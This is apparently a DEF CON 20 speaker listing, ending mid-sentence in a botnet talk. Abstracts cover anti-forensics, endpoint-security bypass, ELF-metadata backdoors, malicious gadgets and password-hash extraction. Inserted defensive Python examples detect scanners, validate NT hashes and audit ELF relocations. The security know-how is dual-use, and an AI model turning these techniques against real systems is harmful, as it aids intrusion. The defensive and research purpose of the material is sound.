Each of these techniques can be detected early by an investigator who is aware of them, and they can be avoided
if you know what to look for. Come learn about Anti-Forensic techniques, and the Anti-Anti-Forensic techniques
that mitigate them.
Michael Perklin is a Senior Investigator and has performed digital-forensic
examinations on over a thousand devices. Michael is a member of the High Technology Crime Investigations Association,
a professor of digital forensics at Sheridan College, and is currently writing his thesis paper on anti-forensic techniques.
Twitter: @mperklin
Creating an A1 Security Kernel in the 1980s (Using “Stone Knives and Bear Skins”)
Tom Perrine Sr Enterprise Architect, Sr Manager IT Infrastructure
This is a retrospective of computer security research and the process of building
a secure operating system for the US government 1983-1990. The paper presents the case study of Kernelized
Secure Operating System (KSOS), an A1 security-kernel operating system. KSOS was written to protect
SCI/compartmented data (sometimes referred to as “above TOP SECRET”), and entered production.
KSOS-11 ran on the PDP-11, and KSOS-32 ran on the DEC VAX. KSOS-11 ran in less than 64K bytes and was a fully
functional OS including a security kernel, UNIX compatibility layer and first generation TCP/IP stack.
The design for KSOS was the first operating system design that was mathematically “proven correct”
using formal specifications and computer based theorem provers.
The presentation also discusses the computing technology of the day - 16-bit computers, line editors, primitive
(by current standards) compilers, theorem provers and how that affected development methods and what could be
accomplished.
This presentation is a technical retrospective of computer security research during 1983-1990 placed in its
social and technical context. This presentation is being written especially for DEF CON’s 20th anniversary
and has never been published before. The last paper published specifically on KSOS was at the 7th NBS
Computer Security Conference in 1984.
Tom “tep” Perrine started on the ARPANET in
grade school, with accounts at MIT-MULTICS and other sites. After college graduation he shared an
IMP on the original ARPANET with the Navy and UCSD. During the 80s he worked on secure operating
systems such as KSOS for the intelligence community. In the 90s he was a security researcher
and CSO at the San Diego Supercomputer Center (SDSC), where he was also involved in “the
Kevin affair”. While at SDSC he also consulted for the FBI on Critical Infrastructure
Protection and was invited to give Congressional testimony on the FBI’s Carnivore program.
Since 2003 he has worked at a video game company, supporting game development studios and
operating hosting facilities for online video games. He has since moved on to developing
world wide IT strategies for the same company. He owns a complete set of the Rainbow Books
and the only copy of Takedown signed by both Tsutomu Shimomura and Kevin Mitnick.
Network Anti-Reconnaissance: Messing with Nmap Through Smoke and Mirrors
Dan "AltF4" Petro Security Researcher, DataSoft Corp
Reconnaissance on a network has been an attacker's game for far too long,
where's the defense? Nmap routinely evades firewalls, traverses NATs, bypasses signature
based NIDS, and gathers up the details of your highly vulnerable box serving Top Secret
documents. Why make it so easy?
In this talk, we will explore how to prevent network reconnaissance by using honeyd to
flood your network with low fidelity honeypots. We then discuss how this lets us
constrain the problem of detecting reconnaissance such that a machine learning algorithm
can be effectively applied. (No signatures!) We will also discuss some important additions
to honeyd that we had to make along the way, and perform a live demonstration of our
free software tool for doing all of the above: Nova.
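The detection idea above, as an added example that is not code from Nova or honeyd: once every unused address in a subnet is bound to a decoy, any source that talks to several decoys is scanning, because nothing legitimate lives there. The subnet, the real-host list, the flow records and the fixed threshold are all constructed or assumed for this example; Nova replaces the threshold with a trained classifier over per-source features like these.

```python
"""Flag reconnaissance by watching who touches decoy addresses.

Added example, not code from the Nova project: a honeyd-style decoy pool
occupies every unused address in a monitored subnet, so any source that
contacts several decoys is scanning, because no legitimate client has a
reason to talk to an address that hosts nothing. Flow records and host
lists below are constructed for the example.
"""
from collections import defaultdict
import ipaddress

# Constructed: the monitored subnet and the two real hosts in it; every
# other address in the subnet is assumed to be bound to a honeyd decoy.
MONITORED = ipaddress.ip_network("10.0.0.0/24")
REAL_HOSTS = {ipaddress.ip_address(h) for h in ("10.0.0.10", "10.0.0.20")}

# Constructed flow records: "epoch src dst dport"
SAMPLE_FLOWS = """\
1000 192.168.1.7 10.0.0.10 443
1001 192.168.1.7 10.0.0.10 443
1002 192.168.1.7 10.0.0.20 22
1003 192.168.1.50 10.0.0.1 22
1003 192.168.1.50 10.0.0.2 22
1003 192.168.1.50 10.0.0.3 80
1004 192.168.1.50 10.0.0.10 80
1004 192.168.1.50 10.0.0.4 443
1010 192.168.1.9 10.0.0.99 8080
"""


def is_decoy(dst):
    """True when dst is in the monitored subnet but is not a real host."""
    return dst in MONITORED and dst not in REAL_HOSTS


def parse_flows(text):
    """Yield (timestamp, src, dst, dport) tuples from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        yield int(ts), ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport)


def profile_sources(text):
    """Per-source counters: distinct decoys contacted, distinct ports, total flows."""
    stats = defaultdict(lambda: {"decoys": set(), "ports": set(), "total": 0})
    for _ts, src, dst, dport in parse_flows(text):
        s = stats[str(src)]
        s["total"] += 1
        s["ports"].add(dport)
        if is_decoy(dst):
            s["decoys"].add(str(dst))
    return stats


def flag_scanners(text, min_decoys=3):
    """Sources that touched at least min_decoys distinct decoy addresses.

    The threshold is an assumption for this example; a scanner sweeping a
    subnet hits decoys in proportion to how much of it they occupy.
    """
    return sorted(src for src, s in profile_sources(text).items()
                  if len(s["decoys"]) >= min_decoys)


if __name__ == "__main__":
    for src, s in profile_sources(SAMPLE_FLOWS).items():
        print(f"{src}: decoys={len(s['decoys'])} ports={len(s['ports'])} total={s['total']}")
    print("scanners:", flag_scanners(SAMPLE_FLOWS))
```

Even a single contact with a decoy (192.168.1.9 above) is worth logging, since no legitimate client has a reason to make it; the threshold only keeps a mistyped address from raising a scan alert on its own. Note that the check needs no signature of Nmap's probes, which is the point of the approach: the decoys turn the question from "what does this traffic look like" into "who is touching addresses that should be silent".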
Dan "AltF4" Petro: By day, Alt is a security researcher
for DataSoft Corp, a small business in Scottsdale Arizona, where he focuses on developing
open source tools for network security. He holds a M.S. in Information Assurance from Arizona
State University where he studied network security and cryptographic protocols. By night,
he is a rogue free software and privacy activist with a penchant for the dramatic. He is a
lifelong hacker and regular member of the Phoenix 2600.
Twitter: @2600AltF4
Bypassing Endpoint Security for $20 or Less
Phil Polstra
Computer Security Professor, University of Dubuque
This talk presents cheap, easily constructed devices that can bypass endpoint security
software by making any USB mass storage device (flash or hard drive) appear to be an
authorized device.
The design and implementation will be discussed in detail. Devices can be built for
approximately $18 (a small package that requires soldering four wires) or $30 (a slightly
larger package that requires no soldering). Some familiarity with microcontrollers and C
programming would be helpful, but is not required for attendees to get the most from this talk.
Phil Polstra was born at an early age. He cleaned out his
savings at age 8 in order to buy a TI99-4A computer for the sum of $450.
Two years later he learned 6502 assembly and has been hacking computers and
electronics ever since. Phil currently works as a professor at a private
Midwestern university. He teaches computer security and forensics.
His current research focus involves use of microcontrollers and small
embedded computers for forensics and pentesting.
Prior to entering academia, Phil held several high level
positions at well-known US companies. He holds a couple of the
usual certs one might expect for someone in his position.
Phil is also an accomplished aviator with several thousand hours
of flight time. He holds 12 ratings including instructor,
commercial pilot, mechanic, inspector, and avionics tech. When not
working, he likes to spend time with his family, fly,
hack electronics, and has been known to build airplanes.
Over the last few years Phil has spoken on various USB-related topics at a number
of conferences such as 44Con, NetSecure, MakerFaire Detroit, and Black Hat.
He has developed a number of cheap, fun, and useful devices for infosec and
forensics professionals.
Twitter: @ppolstra
Facebook: ppolstra
http://ppolstra.blogspot.com
The Safety Dance - Wardriving the Public Safety Band
Robert Portvliet Foundstone
Brad Antoniewicz Foundstone
The 4.9Ghz Public Safety Band has been deployed to a town near you! Police, Emergency Medical, and even Critical Infrastructure (power plants, etc.) maintain wireless networks on this seemingly ‘hidden’ band – but what’s actually there? How can you identify and monitor these networks? Stop by and find out the answers to those questions and more!
Robert Portvliet heads Foundstone's wireless service line.
Brad Antoniewicz works in Foundstone's open
security research division to uncover flaws in popular technologies. He is a contributing author to both
the Hacking Exposed and Hacking Exposed: Wireless series of books and has authored various
internal/external Foundstone tools, whitepapers, and methodologies.
Twitter:@foundstone
http://blog.opensecurityresearch.com
Kevin Poulsen Answers Your Questions
Kevin Poulsen
Kevin Poulsen is the news editor of Wired.com and author of Kingpin:
How One Hacker Took Over the Billion-Dollar Cyber Crime Underground
(February 2011, Crown), the story of the white hat hacker Max Vision
and his turn to the dark side of the for-profit carding underground.
Poulsen is a former hacker, whose best known hack involved penetrating
telephone company computers in the early 1990s to win radio station
phone-in contests. By taking over all the phone lines leading to Los
Angeles radio stations, he was able to guarantee that he would be the
proper-numbered caller to win, for example, $20,000 in cash, and a
Porsche 944 S2 Cabriolet.
When the FBI started pursuing Poulsen, he went underground as a
fugitive. He was featured on NBC’s Unsolved Mysteries, and was finally
arrested in April 1991 after 18 months on the run. He pleaded guilty
to computer fraud and served a little over 5 years in prison. At the
time, it was the longest U.S. sentence ever given for hacking.
Following his release from prison Poulsen was briefly barred from
using computers. Reformed, but still possessed of the curiosity that
contributed to his hacking when he was younger, he became a
journalist. His first magazine feature ran in WIRED in 1998, and
covered computer programmers who were driven to survivalist tactics by
fear of the looming Y2K bug.
When Poulsen’s court supervision expired, he joined a California-based
web start-up called SecurityFocus as editorial director in 2000, and
began reporting security and hacking news. Poulsen repeatedly broke
stories of national importance that were picked up by the mainstream
press: a computer intrusion at a U.S. hospital that, for the first
time, breached patient medical records; hackers "war driving" for
open Wi-Fi networks; a computer virus crippling a safety system at a
nuclear power plant in Ohio; a southern California hacker’s successful
penetration of a Secret Service agent’s PDA, and the attendant theft
of confidential agency files.
Poulsen left SecurityFocus in 2005 and joined Wired.com, where he now
serves as a news editor. In a computer-assisted reporting effort in
2006, Poulsen wrote software that scoured MySpace for registered sex
offenders, identifying hundreds. The story resulted in the arrest of
an active pedophile, led to significant policy changes at MySpace and
spawned federal legislation. In 2007, Poulsen’s reporting revealed
that the FBI had been using a custom spyware program, called a CIPAV,
to infect the computers of criminal suspects. In June 2010, Poulsen
and a co-writer broke the news that the government had secretly
arrested Army intelligence analyst Bradley Manning on suspicion of
leaking hundreds of thousands of classified documents to the
secret-spilling website WikiLeaks.
Poulsen is the founding editor of Wired’s Threat Level blog, which won
the 2008 Knight-Batten Award for Innovation in Journalism, and the
2010 MIN award for best blog. In 2009 Poulsen was inducted into MIN’s
Digital Hall of Fame for online journalism, and in 2010 he was among
those honored as a “Top Cyber Security Journalist” in a peer-voted
award by the SANS Institute. Poulsen's encyclopedic knowledge of "I
Love Lucy" trivia helped propel his team to victory in Hacker Jeopardy
at DEF CON 8.
Q&A with the Men (and Women) in Black
Priest Moderator
Back at DC9 a brave MIB from the CIA received clearance and volunteered to answer any and
all DC attendee's questions with no restrictions as honestly as he could. After that experience it's only
taken us 10 years to get several someones to come back and do it again!
This will be your chance to meet and ask any question you want of the so called Men (and Women) in Black.
Representatives from the NRO, CIA, NSA, DIA, and US Military will field any and all questions you have on
any topic you want. However you may not like the answers.
We promise there will be no extreme renditions, water boarding, assassinations, or mind control
unless you really truly deserve it.
Hacker + Airplanes = No Good Can Come Of This
RenderMan Chief Researcher
What happens when a hacker gets bored and starts looking at an aircraft tracking systems? This talk will look
at ADS-B (Automatic Dependent Surveillance-Broadcast), a common technology installed or being installed on a vast majority of
commercial airliners that involves an unencrypted and unauthenticated radio broadcast. This technology has some interesting
features and weaknesses that are a useful lesson in failures when security is not built in from the beginning. This talk constitutes
a work in progress and hopes to spur more research and investigation into this field.
Brad Haines (RenderMan) CISSP, is a Whitehat by trade, Blackhat by fashion. A very
visible and well known member of the wardriving and hacker community, he does whatever he can to learn how things work, how
to make them better and to teach people the same. A firm believer in the hacker ethic of openness, sharing, and collaboration.
Never afraid to try something new, he can usually be found taking unnecessary risks for the sake of the experience.
Twitter: @ihackedwhat
MegaUpload: Guilty or Not Guilty?
Jim Rennie Attorney
Jennifer Granick Attorney
On January 19, 2012, Kim DotCom was arrested in a dramatic raid after being indicted on federal
criminal charges that he knew that his website, MegaUpload, was a haven of piracy and counterfeiting. In the days
that followed, the media commented on the presumed guilt of MegaUpload. In this debate, Jim argues that the law and
evidence clearly point to MegaUpload's officers being found guilty, while Jennifer will argue that the MegaUpload case
is built on unprecedented and wrongheaded interpretations of copyright law, and thus the principles should be found not
guilty. The debate will concentrate on the charges of conspiracy to commit copyright infringement and aiding &
abetting copyright infringement. After the arguments and rebuttals, the audience will vote and decide the fate of MegaUpload.
Jim Rennie is an attorney currently specializing in privacy and data protection
law and regulation. Previously he was a Public Defender in Las Vegas, and prior to law school was a web application
developer. He has spoken previously at DEF CON and other conferences on a variety of topics concerning law and technology.
Twitter: @falconred
Jennifer Granick specializes in computer crime law and has held such positions as
Civil Liberties Director at the Electronic Frontier Foundation and Executive Director of the Center for Internet and Society
at Stanford Law School. She is best known for her work with Intellectual Property law, free speech, privacy, and other things
relating to computer security, and has represented several high profile hackers.
Twitter: @granick
Stamp Out Hash Corruption! Crack All The Things!
Ryan Reynolds Manager, Security and Privacy at Crowe Horwath LLP
Jonathan Claudius Security Researcher, Spiderlabs Research, Trustwave
The precursor to cracking any password is getting the right hash. In this talk we are
going to cover how we discovered that Cain and Abel, Creddump, Metasploit and other hash extraction tools
regularly yield corrupt hashes that cannot be cracked. We will take a deep dive into password extraction
mechanics, the birth of a viral logic flaw that started it all and how to prevent corrupt hashes. At the
conclusion of this talk we will release patches that prevent hash corruption in these tools that many security
professionals use every day.
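The check a practitioner wants before trusting any of those tools: dump a lab account whose password you set yourself and confirm the NT hash matches what the password should produce. The following is an added example, not the speakers' patches or any tool's code. It carries its own MD4 (so it does not depend on OpenSSL still shipping the legacy MD4 provider), derives the NT hash, and validates a pwdump-style line; the account lines are constructed.

```python
"""Sanity-check dumped password hashes before spending cracking time on them.

Added example, not code from the talk or the patches it mentions. It
implements MD4 in pure Python, derives the NT hash of a known password
(MD4 over the UTF-16LE password), and checks a pwdump-style line
"user:rid:lmhash:nthash:::" against it. The account lines below are
constructed for the example.
"""
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & MASK32


def _md4_block(state, block):
    """One 64-byte MD4 compression step (RFC 1320 rounds 1-3)."""
    X = struct.unpack("<16I", block)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    v = list(state)
    for f, order, shifts, k in rounds:
        for i, idx in enumerate(order):
            a = (-i) % 4  # the updated word rotates a, d, c, b, a, ... each step
            b, c, d = v[(a + 1) % 4], v[(a + 2) % 4], v[(a + 3) % 4]
            v[a] = _rotl((v[a] + f(b, c, d) + X[idx] + k) & MASK32, shifts[i % 4])
    return tuple((s + t) & MASK32 for s, t in zip(state, v))


def md4(data: bytes) -> bytes:
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    padded = data + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    padded += struct.pack("<Q", bit_len)  # length in bits, little-endian
    for off in range(0, len(padded), 64):
        state = _md4_block(state, padded[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoding of the password, lower-case hex."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def parse_pwdump(line: str) -> dict:
    """Split a user:rid:lmhash:nthash::: line as most extraction tools emit it."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def check_hash(line: str, known_password: str) -> list:
    """Return the problems found with one dumped line; an empty list means it looks sane."""
    rec = parse_pwdump(line)
    problems = []
    for name in ("lm", "nt"):
        h = rec[name]
        if len(h) != 32 or any(ch not in "0123456789abcdef" for ch in h):
            problems.append(f"{name} hash is not 32 hex digits")
    if rec["nt"] == EMPTY_NT and known_password:
        problems.append("nt hash is the empty-password hash")
    if rec["nt"] != nt_hash(known_password):
        problems.append("nt hash does not match the known password")
    return problems


# Constructed: a lab account with the password "password", dumped by two tools.
GOOD_LINE = "labuser:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"
BAD_LINE = "labuser:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586d:::"

if __name__ == "__main__":
    print(check_hash(GOOD_LINE, "password"))  # []
    print(check_hash(BAD_LINE, "password"))   # mismatch: do not trust this dump
```

A dump that fails this test for an account you control should not be fed to a cracker at all: every hash in it is suspect, and hours of GPU time will only confirm that nothing cracks. Run the check once per tool and per target build, since the flaw the talk describes lives in the extraction step, not in the cracker.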
Ryan Reynolds has been with Crowe for
five years and is the Manager responsible for Crowe's Penetration Testing services.
Ryan has a wide range of knowledge and experience in system administration and
networking to include security applications and controls. He is a technical lead
for engagements including application, network and infrastructure penetration testing
on both internal and external systems as well as social engineering & physical
security assessments.
Twitter: @reynoldsrb
Jonathan Claudius is a Security Researcher at Trustwave.
He is a member of Trustwave's SpiderLabs - the advanced security team focused on penetration testing,
incident response, and application security. He has ten years of experience in the IT industry with
the last eight years specializing in Security. At Trustwave, Jonathan works in the SpiderLabs
Research Division where he focuses on vulnerability research, network exploitation and is the
creator of the BNAT-Suite. Before joining SpiderLabs, Jonathan ran Trustwave's Global Security
Operations Center.
Twitter: @claudijd
Spy vs Spy: Spying on Mobile Device Spyware
Michael Robinson Consultant
Chris Taylor Security Researcher
Commercial spyware is available for mobile devices, including iPhones, Android Smartphones, BlackBerries, and Nokias. Many of the vendors claim that their software and its operation is undetectable on the smartphones after setup is complete. Is this true? Is there a way to identify whether or not some jerk installed spyware on your mobile phone or are you destined to be PWN'd?
This presentation examines the operation and trails left by five different commercial spyware products for mobile devices. Research for both Android and iPhone 4S will be given. A list of results from physical dumps, file system captures, and user files will be presented to show how stealthy the spyware really was. The results from the analysis of the install files will also be presented. From this information a list of indicators will be presented to determine whether or not spyware is on your phone.
Michael Robinson a/k/a Flash, conducts forensic examinations of computers and mobile devices for consulting firm in the Washington, DC area. In addition to his day job, he teaches graduate level courses in computer forensics and mobile device forensics at Stevenson University and George Mason University. Prior to his current consulting gig, Flash conducted computer forensic examinations in support of federal law enforcement. He worked for the Department of Defense for a bunch of years doing IT and forensics work. Flash has been in school forever. Eventually he'll get smart. He's building on his Master's in Computer Forensics with a Doctorate in the same field.
Chris Taylor is a security researcher and teacher that has been doing IT security, incident response, computer forensics, and mobile device forensics for the last 12 years. His experience comes from doing research, not reading research. Imagine that. He makes fun of his co-presenter constantly. He is also a staunch privacy advocate that hates writing bios.
Scylla: Because There's no Patch for Human Stupidity
Sergio 'flacman' Valderrama Consulting Manager, 2Secure
Carlos Alberto Rodriguez Co-Founder, 2Secure
When there's no technical vulnerability to exploit, you should try to hack what humans left for you,
and believe me, this always works.
Scylla provides all the power that a real audit, intrusion, exclusion and analysis tool needs, giving the possibility of
scanning for misconfiguration bugs dynamically.
Scylla aims to be a better tool for security auditors, extremely fast, designed based on real scenarios, developed by
experienced coders and constructed with actual IT work methods.
The words “Configuration Tracer” are the best definition for Scylla, a tool to help on IT audits.
Sergio 'flacman' Valderrama has been a coder and hacker since he
was in school (15 Years old?). Consulting Manager of 2Secure S.A.S, he has worked as security consultant for more than
6 years. Founder of ColombiaUnderground Team, he studied Computer Engineer at the Universidad de los Andes... (lot
of non interesting crap about titles and experience). And of course, he's the main developer of Scylla.
Carlos Alberto Rodriguez is Co-Founder at 2Secure, a Colombia-based company that provides specialized
security services for multiple sector companies. Senior Developer focused in security development with emphasis in
cryptographic algorithms, Senior Security Consultant, R&D Manager and Security Applications Leader for 2Secure
with over 7 years of experience in security and incident handling.
Twitter: @_S_aint_Iker
Bruce Schneier Answers Your Questions
Bruce Schneier
Bruce Schneier will answer questions on topics ranging from the SHA-3 competition to the TSA to trust and society to squid.
Internationally renowned security technologist Bruce Schneier has
authored twelve books -- most recently Liars and Outliers -- and
hundreds of articles, essays, and academic papers. His influential
newsletter "Crypto-Gram," and his blog "Schneier on Security," are
read by over 250,000 people. Schneier is the Chief Security Technology
Officer of BT.
http://www.schneier.com
Programming Weird Machines with ELF Metadata
Rebecca "bx" Shapiro PhD student, Dartmouth College
Sergey Bratus Research Assistant Professor, Dartmouth College
The Executable and Linkable Format (ELF) is omnipresent; related OS and library
code is run whenever processes are set up and serviced (e.g., dynamically
linked). The loader is the stage manager for every executable. Hardly anyone
appreciates the work that the ELF backstage crew (including the linker and the
loader) puts in to make an executable run smoothly. While the rest of the world
focuses on the star, hackers such as the Grugq (in Cheating the ELF) and Skape
(in Locreate: An Anagram for Relocate), and the ERESI/ELFsh crew, know to
schmooze with the backstage crew. We can make a star out of the loader by
tricking it into performing any computation by presenting it with crafted but
otherwise well-formed ELF metadata. We will provide you with a new reason why
you should appreciate the power of the ELF linker/loader by demonstrating how
specially crafted ELF relocation and symbol table entries can act as
instructions to coerce the linker/loader into performing arbitrary
computation. We will present a proof-of-concept method of constructing ELF
metadata to implement the Turing-complete Brainfuck language primitives, as well
as demonstrate a method of crafting relocation entries to insert a backdoor into
an executable.
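To see what "relocation entries as instructions" means at the byte level, here is an added example, not code from the talk or from ERESI/ELFsh: it packs and decodes raw x86-64 Elf64_Rela entries and applies two triage heuristics that are my own assumptions, not the speakers' construction. A relocation whose target lies inside the symbol table or the relocation table rewrites the loader's own inputs, and several relocations aimed at one cell chain writes through it. The section addresses and entries are constructed.

```python
"""Decode Elf64_Rela entries and flag ones that look like metadata-driven computation.

Added example, not code from the talk or from ERESI/ELFsh. It parses raw
relocation entries (x86-64 Elf64_Rela layout: r_offset, r_info, r_addend)
and applies two heuristics that are assumptions of this example, not the
talk's construction: a relocation that targets the symbol table or the
relocation table itself, and several relocations aimed at one address.
The section layout and entries below are constructed for the example.
"""
import struct

ELF64_RELA = struct.Struct("<QQq")  # r_offset (u64), r_info (u64), r_addend (i64)

# x86-64 relocation types that appear in ordinary dynamic executables
R_X86_64 = {0: "NONE", 1: "64", 5: "COPY", 6: "GLOB_DAT", 7: "JUMP_SLOT",
            8: "RELATIVE", 37: "IRELATIVE"}


def make_rela(r_offset, sym, rtype, addend=0):
    """Pack one entry; ELF64_R_INFO(sym, type) = (sym << 32) | type."""
    return ELF64_RELA.pack(r_offset, (sym << 32) | rtype, addend)


def parse_rela(blob):
    """Decode a .rela.* section body into a list of dicts."""
    if len(blob) % ELF64_RELA.size:
        raise ValueError("relocation section size is not a multiple of 24")
    out = []
    for off in range(0, len(blob), ELF64_RELA.size):
        r_offset, r_info, r_addend = ELF64_RELA.unpack_from(blob, off)
        rtype = r_info & 0xFFFFFFFF
        out.append({"offset": r_offset, "sym": r_info >> 32,
                    "type": R_X86_64.get(rtype, str(rtype)), "addend": r_addend})
    return out


def _inside(addr, rng):
    lo, hi = rng
    return lo <= addr < hi


def audit_rela(entries, rela_range, symtab_range):
    """Return (index, reason) pairs for entries that touch loader metadata or share a target."""
    findings = []
    first_writer = {}
    for i, e in enumerate(entries):
        if _inside(e["offset"], rela_range):
            findings.append((i, "target lies inside the relocation table"))
        elif _inside(e["offset"], symtab_range):
            findings.append((i, "target lies inside the symbol table"))
        if e["offset"] in first_writer:
            findings.append((i, f"same target as entry {first_writer[e['offset']]}"))
        else:
            first_writer[e["offset"]] = i
    return findings


# Constructed layout: .dynsym at 0x400300-0x400400, .rela.dyn at 0x400500-0x400600,
# GOT at 0x601000. Entries 0 and 1 are what a normal binary carries; 2 and 3 are crafted.
SYMTAB_RANGE = (0x400300, 0x400400)
RELA_RANGE = (0x400500, 0x400600)
SAMPLE_RELA = b"".join([
    make_rela(0x601000, 0, 8, 0x400800),  # R_X86_64_RELATIVE: base + addend into the GOT
    make_rela(0x601008, 3, 6),            # R_X86_64_GLOB_DAT for dynamic symbol 3
    make_rela(0x400320, 2, 1),            # R_X86_64_64 writing a symbol's value into .dynsym
    make_rela(0x601008, 4, 1, 0x10),      # second write to the GOT slot entry 1 already fills
])

if __name__ == "__main__":
    entries = parse_rela(SAMPLE_RELA)
    for i, e in enumerate(entries):
        print(i, e)
    for i, why in audit_rela(entries, RELA_RANGE, SYMTAB_RANGE):
        print(f"entry {i}: {why}")
```

Both heuristics are for triage, not a verdict: a compiler-produced binary gives each GOT slot one relocation and never relocates its own symbol table, so a hit is worth a look in a disassembler, but the absence of hits says nothing about the symbol table tricks the talk also covers. On a real binary, read the ranges from the section headers rather than hard-coding them as done here.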
Rebecca "bx" Shapiro is a graduate student at a small college in Northern
Appalachia. She enjoys tinkering with systems in undocumented manners to find hidden sources of computation. She
hopes to continue this work to find more specimens for Sergey Bratus's weird machine zoo.
Twitter: @bxsays
Sergey Bratus is a Northern Appalachian who hacks DWARF and ELF. It is his ambition
to collect and classify all kinds of weird machines; he is also a member of the http://langsec.org
conspiracy to eliminate large classes of bugs.
Twitter: @sergeybratus
We Have You by the Gadgets
Mickey Shkatov
Toby Kohlenberg Senior InfoSec Specialist, Fortune 500 company
Why send someone an executable when you can just send them a sidebar gadget?
We will be talking about the Windows gadget platform and the nastiness that can be done
with it: how gadgets are made, how they are distributed and, more importantly, their weaknesses.
Gadgets are comprised of JS, CSS and HTML and are applications that the Windows
operating system has embedded by default. As a result there are a number of
attack vectors that are interesting to explore and take advantage of.
We will be talking about our research into creating malicious gadgets, misappropriating
legitimate gadgets and the sorts of flaws we have found in published gadgets.
Mickey Shkatov AKA "Laplinker" , is a proud DC9723 member, not a Mossad agent, a breaker of code,
a researcher of vulnerabilities that will never see the light of day, a lunatic and a fun guy to drink with.
Twitter: @laplinker
http://www.laplinker.com
Toby Kohlenberg is an opinionated loud mouth who occasionally has interesting insights and useful
things to say about a wide variety of information security topics.
He's worked on a large number of different technologies in the information security space.
Past speaker at: T2, Shmoocon, Toorcon Seattle, PacSec and CanSecWest.
Can You Track Me Now? Government And Corporate Surveillance Of Mobile Geo-Location Data
Christopher Soghoian Open Society Fellow, Open Society Foundations
Ben Wizner Director, Speech, Privacy, & Technology Project, ACLU
Catherine Crump Staff Attorney, Speech, Privacy, & Technology Project, ACLU
Ashkan Soltani Independent Researcher & Consultant on privacy, security, and behavioral economics
Our mobile phones and apps systematically collect and store comprehensive historical lists of our locations and our travels.
Advertising and marketing companies extract and interpret these lists for use in their information-gathering networks, effectively
turning our phones into 24/7 location tracking devices. Because this information is readily available to the government, law
enforcement agencies now have unparalleled access to knowledge of where you are, where you've been, and through inference, who you are.
In this panel, tech experts Christopher Soghoian and Ashkan Soltani, alongside Catherine Crump, staff attorney with the ACLU's
Project on Speech, Privacy, and Technology, will present a briefing on the current technological and legal landscape of location
data tracking. The panelists will explore how consumer location tracking efforts weave a story about the systemic privacy
vulnerabilities of smart phones and the legal ways in which law enforcement has been able to hitch a ride. The panel will
be moderated by the Director of the ACLU's Project on Speech, Privacy, and Technology, Ben Wizner.
Christopher Soghoian is a Washington, D.C. based Open Society Fellow, a
Graduate Fellow at the Center for Applied Cybersecurity Research, and a Ph.D. Candidate in the School of Informatics
and Computing at Indiana University. Soghoian's research is focused on the topic of tech privacy, including both
consumer issues and government surveillance. He has used the Freedom of Information Act and other investigative
techniques to shed light on the scale of and methods by which the U.S. government spies on mobile cell phones and
this work has been cited by the Ninth Circuit Court of Appeals and featured on the Colbert Report.
Twitter: @csoghoian
http://www.dubfire.net/, http://paranoia.dubfire.net/
Ben Wizner is the Director of ACLU's Speech, Privacy & Technology
Project, which is dedicated to protecting and expanding the First Amendment freedoms of expression, association, and
inquiry; expanding the right to privacy and increasing the control that individuals have over their personal
information; and ensuring that civil liberties are enhanced rather than compromised by new advances in science and
technology. He has litigated numerous cases involving civil liberties abuses, including challenges to government
watchlists and Internet censorship. He has appeared regularly in the media, testified before Congress, and traveled
several times to Guantanamo Bay to monitor military commission proceedings. Ben is a graduate of Harvard College and
New York University School of Law.
Catherine Crump is a Staff Attorney with the ACLU's Speech, Privacy and
Technology Project. She specializes in free speech and privacy litigation, particularly regarding the impact of new
technologies on First and Fourth Amendment rights. Crump recently organized a nationwide public records investigation
that found local police departments regularly tracking citizens through their cell phones without warrants. The project
was featured in myriad news outlets, including The New York Times, The Washington Post, and MSNBC. She is also litigating
a series of cases challenging the government's claim that it can legally track the location of people's cell phones without
a warrant. Crump has been counsel of record for several ACLU amicus briefs in important cases involving technological
surveillance, including United States v. Jones, the Supreme Court case heard last term ruling that the GPS tracking of
vehicles constitutes a search. Crump is a non-residential fellow at the Stanford Center for Internet and Society, a 2004
graduate of Stanford Law School, and a 2000 graduate of Stanford University.
Twitter: @catherinencrump
Ashkan Soltani is an independent researcher and consultant focused on
privacy, security, and behavioral economics. He has more than 15 years of experience as a technology consultant
and has published three major reports on the extent and means of data tracking: "KnowPrivacy: The Current State of
Web Privacy, Data Collection, and Information Sharing," "Flash Cookies and Privacy," and "Flash Cookies and Privacy II."
His work highlights the prevalence and practice of tracking online, including the use of specific technologies designed
to circumvent consumer privacy choices online. He has served as a staff technologist in the Division of Privacy and
Identity Protection at the Federal Trade Commission and also worked as the primary technical consultant on the Wall
Street Journal's What They Know series, investigating Internet privacy and online tracking.
Twitter: @ashk4n
Botnets Die Hard - Owned and Operated
Aditya K. Sood
Security Practitioner - Isec Partners | PhD Candidate MSU
Richard J. Enbody Associate Professor,
Dep't of Computer Science and Engineering at Michigan State University
Botnet designs are becoming more robust and sophisticated with the passage of time.
While the security world is grappling with the security threats posed by Zeus and SpyEye, a new breed of
botnets has begun to flourish. Present-day botnets such as smoke, ICE-X, NGR, etc use a mix of
pre-existing and newly developed exploitation tactics to disseminate infections. Botnets have been
